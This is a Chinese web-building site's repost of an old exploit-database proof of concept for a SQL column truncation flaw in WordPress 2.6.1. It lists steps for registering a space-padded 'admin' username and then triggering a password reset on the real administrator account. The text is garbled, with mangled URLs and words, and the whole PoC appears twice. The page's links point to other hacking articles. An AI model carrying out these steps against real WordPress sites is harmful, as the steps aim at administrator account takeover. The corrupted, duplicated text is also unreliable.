WordPress 2.6.1 SQL Column Truncation Vulnerability
网站建设 2023-02-09 11:06www.1681989.com免费网站
用wordpress的要注意了
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress./
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://.suspekt./2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# this hack we can remote change adm password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server./wp-log.php?action=register 2. register as: log: adm x
email: your email^ adm[55 space chars]x now, we have duplicated 'adm' aount database 3. go to url: server./wp-log.php?action=lostpassword 4. write your email to field and submit this form 5. check your email and go to reset confirmation lk 6. adm's password changed, but new password will be send to correct adm email ;/ # milw0rm.
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress./
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://.suspekt./2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# this hack we can remote change adm password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server./wp-log.php?action=register 2. register as: log: adm x
email: your email^ adm[55 space chars]x now, we have duplicated 'adm' aount database 3. go to url: server./wp-log.php?action=lostpassword 4. write your email to field and submit this form 5. check your email and go to reset confirmation lk 6. adm's password changed, but new password will be send to correct adm email ;/ # milw0rm.
上一篇:教你如何破别人的ASP木马密码
下一篇:看黑客是如何黑了落伍者的(图)